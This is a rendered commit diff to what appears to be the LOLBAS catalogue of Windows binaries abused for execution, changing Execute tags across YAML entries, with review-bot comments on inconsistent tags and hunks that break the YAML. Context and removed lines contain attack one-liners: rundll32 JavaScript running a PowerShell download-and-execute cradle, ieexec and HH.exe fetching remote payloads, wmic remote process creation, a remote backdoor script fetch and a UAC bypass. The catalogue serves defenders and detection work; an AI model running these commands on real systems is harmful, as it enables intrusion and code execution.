Various changes to Execute tags

Wietze 2024-11-20 23:08:37 +00:00
parent ab3ea8ff63
commit 089614e6a9
No known key found for this signature in database
GPG Key ID: E17630129FF993CF
52 changed files with 86 additions and 100 deletions

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: .NetObjets - Execute: .NetObjects
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe
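Review bot: the changed line keeps the dot-prefixed form (`.NetObjets` → `.NetObjects`) while this same commit renames `.NetDLL` and `.NetEXE` to `DLL (.NET)` and `EXE (.NET)` in the InstallUtil, regasm, regsvcs and ieexec files, and the eventvwr hunk introduces `.NetObjects` as well. Pick one convention for the .NET-flavoured tags (for example `Objects (.NET)`) so the tag filter does not end up with two spellings of the same family; the typo fix itself is correct.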

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1053.002 MitreID: T1053.002
OperatingSystem: Windows 7 or older OperatingSystem: Windows 7 or older
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: C:\WINDOWS\System32\At.exe - Path: C:\WINDOWS\System32\At.exe
- Path: C:\WINDOWS\SysWOW64\At.exe - Path: C:\WINDOWS\SysWOW64\At.exe
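Review bot: `- Execute: EXE` → `- Execute: CMD` is applied here and in roughly a dozen other files in this commit (conhost, schtasks, SettingSyncHost, ssh, wmic, msedgewebview2, wt) with nothing defining what separates CMD from EXE, and some files keep EXE (HH.exe, eventvwr). The commit message "Various changes to Execute tags" does not say either. A one-line rule in the message (for instance: CMD when the binary takes an arbitrary command line to run, EXE when it launches a given executable file) would make the retagging reviewable and keep the two tags from drifting back together.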

View File

@ -22,6 +22,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Execute: INF - Execute: INF
- Execute: Remote
Full_Path: Full_Path:
- Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: "conhost.exe --headless calc.exe" - Command: "conhost.exe --headless calc.exe"
Description: Execute calc.exe with conhost.exe as parent process Description: Execute calc.exe with conhost.exe as parent process
Usecase: Specify --headless parameter to hide child process window (if applicable) Usecase: Specify --headless parameter to hide child process window (if applicable)
@ -21,7 +21,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: c:\windows\system32\conhost.exe - Path: c:\windows\system32\conhost.exe
Detection: Detection:

View File

@ -13,6 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Application: GUI - Application: GUI
- Execute: EXE
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
@ -22,6 +23,7 @@ Commands:
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Application: GUI - Application: GUI
- Execute: .NetObjects
Full_Path: Full_Path:
- Path: C:\Windows\System32\eventvwr.exe - Path: C:\Windows\System32\eventvwr.exe
- Path: C:\Windows\SysWOW64\eventvwr.exe - Path: C:\Windows\SysWOW64\eventvwr.exe

View File

@ -11,8 +11,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: HH.exe c:\windows\system32\calc.exe Tags:
Description: Executes calc.exe with HTML Help. - Execute: EXE
- Application: GUI
Usecase: Execute process with HH.exe Usecase: Execute process with HH.exe
Category: Execute Category: Execute
Privileges: User Privileges: User
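Review bot: as rendered, this hunk drops the first entry's command: the left column has `- Command: HH.exe c:\windows\system32\calc.exe` and `Description: Executes calc.exe with HTML Help.` with no counterpart on the right, where only `Tags:`, `- Execute: EXE` and `- Application: GUI` appear, and the header counts (8 → 9) confirm two lines removed for three added. That leaves `Usecase: Execute process with HH.exe` and the fields below it without a `- Command:` item to belong to. The intent is presumably to add the Tags block after `OperatingSystem:` and keep the Command and Description lines after it; please re-check the file.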
@ -20,7 +21,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
- Command: HH.exe http://some.url/payload.chm - Application: GUI
Description: Executes a remote payload.chm file which can contain commands. Description: Executes a remote payload.chm file which can contain commands.
Usecase: Execute commands with HH.exe Usecase: Execute commands with HH.exe
Category: Execute Category: Execute
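Review bot: same problem in this hunk: `- Command: HH.exe http://some.url/payload.chm` is replaced by `- Application: GUI` (7 → 7 lines), so `Description: Executes a remote payload.chm file which can contain commands.` no longer follows a Command item and the entry's YAML structure breaks. The Application tag should be an additional line under `Tags:`, not a replacement for the Command line.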

View File

@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Execute: Remote - Execute: Remote
- Execute: .NetEXE - Execute: EXE (.NET)
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
Description: Downloads and executes bypass.exe from the remote server. Description: Downloads and executes bypass.exe from the remote server.
Usecase: Download and run attacker code from remote location Usecase: Download and run attacker code from remote location
@ -23,7 +23,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Execute: Remote - Execute: Remote
- Execute: .NetEXE - Execute: EXE (.NET)
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe

View File

@ -12,8 +12,8 @@ Commands:
MitreID: T1218.004 MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
- Execute: .NetEXE - Execute: EXE (.NET)
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE. Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting Usecase: Use to execute code and bypass application whitelisting
@ -22,8 +22,8 @@ Commands:
MitreID: T1218.004 MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
- Execute: .NetEXE - Execute: EXE (.NET)
- Command: InstallUtil.exe https://example.com/payload - Command: InstallUtil.exe https://example.com/payload
Description: It will download a remote payload and place it in INetCache. Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server Usecase: Downloads payload from remote server

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: WSH - Execute: JScript
- Command: jsc.exe /t:library Library.js - Command: jsc.exe /t:library Library.js
Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll. Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
Usecase: Compile attacker code on system. Bypass defensive counter measures. Usecase: Compile attacker code on system. Bypass defensive counter measures.
@ -21,7 +21,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: WSH - Execute: JScript
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe

View File

@ -22,8 +22,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10S, Windows 11 OperatingSystem: Windows 10S, Windows 11
Tags: Tags:
- Execute: VB.Net - Execute: XOML
- Execute: Csharp
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code Usecase: Compile and run code
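Review bot: replacing `- Execute: VB.Net` and `- Execute: Csharp` with a single `- Execute: XOML` loses information the unchanged Description still states ("Compile and execute C# or VB.net code in a XOML file"). If Execute tags are meant to name the input format only, the msbuild hunk in this same commit keeps `CSharp` for `msbuild.exe project.csproj`, which is also an input file; either keep `CSharp` (with the casing used in msbuild) next to `XOML`, or state the rule in the commit message. The same applies to the second hunk at -32.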
@ -32,8 +31,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10S, Windows 11 OperatingSystem: Windows 10S, Windows 11
Tags: Tags:
- Execute: VB.Net - Execute: XOML
- Execute: Csharp
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.014 MitreID: T1218.014
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
Tags: Tags:
- Execute: DLL - Execute: COM
- Command: mmc.exe gpedit.msc - Command: mmc.exe gpedit.msc
Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC. Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.
Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL. Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.
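Review bot: `- Execute: DLL` → `- Execute: COM` on this entry contradicts its own Description ("Load an arbitrary payload DLL by configuring COR Profiler registry settings"): the profiler is located through a COM CLSID, but what ends up executed is the DLL, and the second hunk in this file adds `- Execute: DLL` for the other entry. Keeping both tags here (`COM` and `DLL`) describes the technique better and matches the multi-tag style used for InstallUtil in this commit.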
@ -20,6 +20,8 @@ Commands:
Privileges: Administrator Privileges: Administrator
MitreID: T1218.014 MitreID: T1218.014
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
Tags:
- Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\mmc.exe - Path: C:\Windows\System32\mmc.exe
- Path: C:\Windows\SysWOW64\mmc.exe - Path: C:\Windows\SysWOW64\mmc.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127.001 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: Csharp - Execute: CSharp
- Command: msbuild.exe project.csproj - Command: msbuild.exe project.csproj
Description: Build and execute a C# project stored in the target csproj file. Description: Build and execute a C# project stored in the target csproj file.
Usecase: Compile and run code Usecase: Compile and run code
@ -21,7 +21,7 @@ Commands:
MitreID: T1127.001 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: Csharp - Execute: CSharp
- Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
Description: Executes generated Logger DLL file with TargetLogger export Description: Executes generated Logger DLL file with TargetLogger export
Usecase: Execute DLL Usecase: Execute DLL
@ -39,7 +39,7 @@ Commands:
MitreID: T1127.001 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: WSH - Execute: XSL
- Command: msbuild.exe @sample.rsp - Command: msbuild.exe @sample.rsp
Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line. Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
Usecase: Bypass command-line based detections Usecase: Bypass command-line based detections
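Review bot: `- Execute: WSH` → `- Execute: XSL` is attached to the `msbuild.exe @sample.rsp` entry, whose Description says the RSP file only holds msbuild command-line options; nothing in it is XSL (nor WSH), so the new tag is no more accurate than the old one. If the entry is about wrapping one of the other msbuild commands in a response file, tag it the same as the wrapped command (for example `CSharp`, as on the `project.csproj` entry above) rather than with a format that does not occur in it.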

View File

@ -51,6 +51,8 @@ Commands:
MitreID: T1218.007 MitreID: T1218.007
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: MSI
- Execute: MST
- Execute: Remote - Execute: Remote
Full_Path: Full_Path:
- Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\System32\msiexec.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
- Command: regasm.exe /U AllTheThingsx64.dll - Command: regasm.exe /U AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the UnRegisterClass function. Description: Loads the target .DLL file and executes the UnRegisterClass function.
Usecase: Execute code and bypass Application whitelisting Usecase: Execute code and bypass Application whitelisting
@ -21,7 +21,7 @@ Commands:
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
- Command: regsvcs.exe AllTheThingsx64.dll - Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .Net DLL file and executes the RegisterClass function. Description: Loads the target .Net DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting Usecase: Execute dll file and bypass Application whitelisting
@ -21,7 +21,7 @@ Commands:
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: .NetDLL - Execute: DLL (.NET)
Full_Path: Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe

View File

@ -22,15 +22,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');") - Execute: Remote
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
Usecase: Execute code from Internet
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
Usecase: Proxy execution Usecase: Proxy execution
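Review bot: this hunk does more than retag: it deletes a whole entry (the left-only lines from `- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";...` through `- Execute: JScript`, 15 → 7 lines) and adds `- Execute: Remote` to the preceding DLL-tagged entry whose command sits outside the hunk. The removed entry was the one described as "Execute code from Internet", so please confirm the Remote tag is meant for the entry that remains, and mention the removal in the commit message, which "Various changes to Execute tags" does not cover.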
@ -40,15 +32,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: JScript - Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
Usecase: Execute code from Internet Usecase: Execute code from Internet
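Review bot: a second entry is removed here (15 → 6 lines, the calc.exe variant whose Description ends "and then kills the Rundll32.exe process that was started"), again without mention in the commit message. If this is deliberate de-duplication against the surviving `eval(...w.run("calc")...)` entry, say so in the message; if not, restore the `- Command:` through `- Execute: JScript` lines.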
@ -75,8 +58,7 @@ Commands:
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows 10 (and likely previous versions), Windows 11 OperatingSystem: Windows 10 (and likely previous versions), Windows 11
Tags: Tags:
- Execute: DLL - Execute: COM
- Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\System32\rundll32.exe
- Path: C:\Windows\SysWOW64\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Execute: Powershell - Execute: PowerShell
Full_Path: Full_Path:
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1053.005 MitreID: T1053.005
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
Description: Create a scheduled task on a remote computer for persistence/lateral movement Description: Create a scheduled task on a remote computer for persistence/lateral movement
Usecase: Create a remote task to run daily relative to the the time of creation Usecase: Create a remote task to run daily relative to the the time of creation
@ -21,7 +21,7 @@ Commands:
MitreID: T1053.005 MitreID: T1053.005
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: c:\windows\system32\schtasks.exe - Path: c:\windows\system32\schtasks.exe
- Path: c:\windows\syswow64\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe

View File

@ -21,7 +21,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: C:\Windows\System32\SettingSyncHost.exe - Path: C:\Windows\System32\SettingSyncHost.exe
- Path: C:\Windows\SysWOW64\SettingSyncHost.exe - Path: C:\Windows\SysWOW64\SettingSyncHost.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 1809, Windows Server 2019 OperatingSystem: Windows 10 1809, Windows Server 2019
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: ssh -o ProxyCommand=calc.exe . - Command: ssh -o ProxyCommand=calc.exe .
Description: Executes calc.exe from ssh.exe Description: Executes calc.exe from ssh.exe
Usecase: Performs execution of specified file, can be used as a defensive evasion. Usecase: Performs execution of specified file, can be used as a defensive evasion.
@ -21,7 +21,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags: Tags:
- Execute: EXE - Execute: CMD
Full_Path: Full_Path:
- Path: c:\windows\system32\OpenSSH\ssh.exe - Path: c:\windows\system32\OpenSSH\ssh.exe
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
Tags: Tags:
- Execute: Powershell - Execute: PowerShell
Full_Path: Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\System32\SyncAppvPublishingServer.exe
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.012 MitreID: T1218.012
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: COM
Full_Path: Full_Path:
- Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\System32\verclsid.exe
- Path: C:\Windows\SysWOW64\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe

View File

@ -21,7 +21,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
Description: Execute evil.exe on the remote system. Description: Execute evil.exe on the remote system.
Usecase: Execute binary on a remote system Usecase: Execute binary on a remote system
@ -30,7 +30,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: CMD
- Execute: Remote - Execute: Remote
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
Description: Create a volume shadow copy of NTDS.dit that can be copied. Description: Create a volume shadow copy of NTDS.dit that can be copied.
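Review bot: `- Execute: EXE` → `- Execute: CMD` is the odd choice for this entry: its command is `wmic.exe process get brief /format:"https://.../Wmic_calc.xsl"`, i.e. execution through a remote XSL stylesheet, and this same commit introduces an `XSL` tag for winrm.vbs and msbuild. `XSL` alongside the existing `- Execute: Remote` describes it; `CMD` fits the `/node:... process call create` entry in the first hunk, not this one. While here, the context line `Description: Create a volume shadow copy of NTDS.dit that can be copied.` belongs to a different command and should be corrected.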

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: COM
- Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
Usecase: Run a com object created in registry to evade defensive counter measures Usecase: Run a com object created in registry to evade defensive counter measures
@ -21,7 +21,7 @@ Commands:
MitreID: T1218 MitreID: T1218
